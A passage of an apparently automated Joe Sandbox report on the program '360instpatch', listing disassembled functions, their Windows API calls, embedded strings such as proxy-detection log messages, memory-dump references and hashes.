                                                                                                                                                                                                              • Instruction ID: 4bcf6394b00bd34253693e3b8fdf5fb3d80c627bdd10a2b6b4a31958f87920c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29ae752743a7f347728abb65440336fbf29fcb16b52b5fa172672504de6e4767
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D40162332041106DDA711AA95C89B3F3E78DB4766CF724997F076D53A0D52CC4A784B2
                                                                                                                                                                                                              Function 6BF01914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF0191B
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF01926
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF01930
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF01940
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [P2SP_DetectIEProxySetting] cost %d ms, xrefs: 6BF0194E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [P2SP_DetectIEProxySetting] cost %d ms
                                                                                                                                                                                                              • API String ID: 876511985-3580160709
                                                                                                                                                                                                              • Opcode ID: 1fbecc869d5a9f7df51001190ba7d38d962bb80a1deafa31b23998382b8d69ba
                                                                                                                                                                                                              • Instruction ID: 99cfa55bc6fa08f801b63107b393ba7ee7ea5fc137a9677930a8238375e06d6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fbecc869d5a9f7df51001190ba7d38d962bb80a1deafa31b23998382b8d69ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94E06D73D1022A5BCF409BF49C057AE3AB1AB40369F590466E404F7161EB7D9E448BA2
                                                                                                                                                                                                              Function 6BEF789B Relevance: 7.6, APIs: 5, Instructions: 76registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(?,?,00000000,6BF61038,00000000,00000001,00000000,?,?), ref: 6BEF78C9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?), ref: 6BEF78EB
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?), ref: 6BEF7900
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?), ref: 6BEF790D
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?,?), ref: 6BEF7931
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue$AllocCreateErrorGlobalLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2249321745-0
                                                                                                                                                                                                              • Opcode ID: 1b3343a607ddba5b1bd6c05600e7ee26539141f11ddf9e8d5e4b8b733d02820f
                                                                                                                                                                                                              • Instruction ID: 6acaa090c9bbfbd62feefa41fead582712434051f3889be30823cd0384e7fb25
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b3343a607ddba5b1bd6c05600e7ee26539141f11ddf9e8d5e4b8b733d02820f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9218E72600644EFDB228F59CC88E577BBDFB86B64720885DF592C6210D335D825CB70
                                                                                                                                                                                                              Function 00B7A52B Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00B7A58E
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00B7A5B9
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00B7A5D6
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B7A5DE
                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00B7A5F3
                                                                                                                                                                                                                • Part of subcall function 00B7A29F: GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00B7FC56,?,?,?,00000000,?,?), ref: 00B7A2C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSelect$CompatibleCreateDeleteDrawGdipImageRect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 240731188-0
                                                                                                                                                                                                              • Opcode ID: 209c4f06a9961b5a1b68ffc7e7fe88cd72d8debd49daf0da9961c63bb6c9961a
                                                                                                                                                                                                              • Instruction ID: 63972b75a3a3ab9c72063bd724fccb1adf06319bc1622c5a381c395d68b8649c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 209c4f06a9961b5a1b68ffc7e7fe88cd72d8debd49daf0da9961c63bb6c9961a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF21FA71500109EBDF11AF90CD81EAE7BB6FF94300F108495F925A21A1EB71EA65EB91
                                                                                                                                                                                                              Function 6BF303E4 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF30418
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 6BF30428
                                                                                                                                                                                                              • WSAAsyncGetHostByName.WS2_32(00000000,00000401,?,00000000,00000400), ref: 6BF3045C
                                                                                                                                                                                                              • WSASetLastError.WS2_32(00002733), ref: 6BF3046F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncErrorHostLastName_memsetinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1704644561-0
                                                                                                                                                                                                              • Opcode ID: 6a932306e515564a1cd2b8927cd565f3c8d16e5b4a940b6c3e6e6922829120a9
                                                                                                                                                                                                              • Instruction ID: d60273270756fc5117e6cb5b2a9286438f4c11b968d55b0242af358aa3a14c6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a932306e515564a1cd2b8927cd565f3c8d16e5b4a940b6c3e6e6922829120a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE21D172A00315ABEB00DF74D845FAE77B8AF49714F10456AF506E72A1D7B8DA0087A0
                                                                                                                                                                                                              Function 00B7E037 Relevance: 7.6, APIs: 5, Instructions: 52fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E069
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00BFCDA4,?,?), ref: 00B7E07D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E08D
                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,00B485B6,00000000,?,?,?,?,?,?,?), ref: 00B7E0A6
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00B7E0B3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTemp_memset$DeleteNamePath
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433304728-0
                                                                                                                                                                                                              • Opcode ID: 76f20b2b36caa586338884c0a258755f783d72705dbb5735277daa188febd28d
                                                                                                                                                                                                              • Instruction ID: d153da0b6015d0c0c9660cdd9a6ed5605bfba5fad38f71d4019ccefb99aa3e40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76f20b2b36caa586338884c0a258755f783d72705dbb5735277daa188febd28d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 181165F6A0121CABCB10DB94EC49FDE73BCAB48704F1040F5B615E3141DA74AB848BA5
                                                                                                                                                                                                              Function 6BF274A3 Relevance: 7.5, APIs: 5, Instructions: 47registrysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,74DF23A0,?,?,6BF05E2D), ref: 6BF274BC
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,6BF05E2D), ref: 6BF274C4
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000000,00000004,?,00000001,?,?,6BF05E2D), ref: 6BF274F9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeEventNotifyObjectResetSingleValueWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1286042878-0
                                                                                                                                                                                                              • Opcode ID: 4c23344a902864f5ac683d3624a9d240a3f69d7b139e616bbd8be579a2d1e648
                                                                                                                                                                                                              • Instruction ID: 3d813eac21dc71d29a5c996d86adb658b79e0ada74ee5c83c377cd2eb3b083dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c23344a902864f5ac683d3624a9d240a3f69d7b139e616bbd8be579a2d1e648
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42018173654202EFEB211FE5CC84E17BBE9EB49798B000869F292D1070D376EC449B20
                                                                                                                                                                                                              Function 00B949FC Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00B94A1A
                                                                                                                                                                                                                • Part of subcall function 00BA339F: __mtinitlocknum.LIBCMT ref: 00BA33B5
                                                                                                                                                                                                                • Part of subcall function 00BA339F: __amsg_exit.LIBCMT ref: 00BA33C1
                                                                                                                                                                                                                • Part of subcall function 00BA339F: EnterCriticalSection.KERNEL32(?,?,?,00BA4EDB,0000000D,00BEEFE8,00000008,00B9EA68,?,00000000), ref: 00BA33C9
                                                                                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 00B94A25
                                                                                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 00B94A34
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,00BEE890,0000000C,00BA4E21,00000000,?,00BA05A7,?,00000001,?,?,00BA3329,00000018,00BEEF60,0000000C), ref: 00B94A64
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00BA05A7,?,00000001,?,?,00BA3329,00000018,00BEEF60,0000000C,00BA33BA,?,?,?,00BA4EDB,0000000D), ref: 00B94A75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                                                                                              • Opcode ID: 0446f59fb9a41624d65711bd01f3e0ad65129e8df411cd8b2dd37f52b5f1ee8f
                                                                                                                                                                                                              • Instruction ID: 3a60b57916ef9aabd23db26c9ea1a46cd47a46aaac7b434ebc06aae5760d8a61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0446f59fb9a41624d65711bd01f3e0ad65129e8df411cd8b2dd37f52b5f1ee8f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C016231945305AADF206BB09D1AF5D3BE4EF01761F1445E9F51467191DF3489418A98
                                                                                                                                                                                                              Function 6BEF640D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BEF6414
                                                                                                                                                                                                                • Part of subcall function 6BEF313B: __EH_prolog3_GS.LIBCMT ref: 6BEF3142
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF6452
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_$_malloc_memset
                                                                                                                                                                                                              • String ID: [%d] Proxy = %d$[%d] Proxy0 = %d
                                                                                                                                                                                                              • API String ID: 4091186113-2032588536
                                                                                                                                                                                                              • Opcode ID: 99b2765e7563a5a74320cc8321f9ea566f788f6de8529a1259953cfc4d07b273
                                                                                                                                                                                                              • Instruction ID: 9b4661ec897887fbe91ae3cb2f05b983e43b81fc7ca7e056a364fbc9595dc005
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99b2765e7563a5a74320cc8321f9ea566f788f6de8529a1259953cfc4d07b273
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C419077901605BFCB15CFB8C841EEAB7BAFF48304F048A09F156A7150EB3A35248BA1
                                                                                                                                                                                                              Function 00B86894 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3__memcmp_memset
                                                                                                                                                                                                              • String ID: [360signdata]sign=
                                                                                                                                                                                                              • API String ID: 1379577869-1737267629
                                                                                                                                                                                                              • Opcode ID: 82c41c0a089fd45705a6d7bc726326a67bede19d053740032a07087b146197bd
                                                                                                                                                                                                              • Instruction ID: 02fd9c38435ce6e3de282fa391d87c9e4fe6355a37c1796010f1ccfa616843d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82c41c0a089fd45705a6d7bc726326a67bede19d053740032a07087b146197bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC416E719046189ACB24FA60CC81BEEB3E8EF14315F5445EAE50AA71E1F774AE84CF50
                                                                                                                                                                                                              Function 6BF329C9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF329D0
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF329D7
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: _memset.LIBCMT ref: 6BF23FAF
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23FCA
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountH_prolog3Tick_malloc_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: Stun Begining$st.p.360.cn
                                                                                                                                                                                                              • API String ID: 1577093084-2775616079
                                                                                                                                                                                                              • Opcode ID: 881596f376f10f8590526522980eb2d210f05223f92e6d29618f86574aec623f
                                                                                                                                                                                                              • Instruction ID: 88f1b79a6e89634536f4749ab2288c91b69574440c4dc43ab9ad44ed7dec9941
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 881596f376f10f8590526522980eb2d210f05223f92e6d29618f86574aec623f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0831C473A047629FDF74DFB48891A5EB7E0AF01708B10886DD1A6875B0DB7E9580CBD1
                                                                                                                                                                                                              Function 00B48544 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B4854B
                                                                                                                                                                                                                • Part of subcall function 00B95546: _malloc.LIBCMT ref: 00B95560
                                                                                                                                                                                                                • Part of subcall function 00B2A8EB: _wcsnlen.LIBCMT ref: 00B2A91D
                                                                                                                                                                                                                • Part of subcall function 00B7E037: _memset.LIBCMT ref: 00B7E069
                                                                                                                                                                                                                • Part of subcall function 00B7E037: GetTempPathW.KERNEL32(00000104,?,00BFCDA4,?,?), ref: 00B7E07D
                                                                                                                                                                                                                • Part of subcall function 00B7E037: _memset.LIBCMT ref: 00B7E08D
                                                                                                                                                                                                                • Part of subcall function 00B7E037: GetTempFileNameW.KERNEL32(?,00B485B6,00000000,?,?,?,?,?,?,?), ref: 00B7E0A6
                                                                                                                                                                                                                • Part of subcall function 00B7E037: DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00B7E0B3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00B485F7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
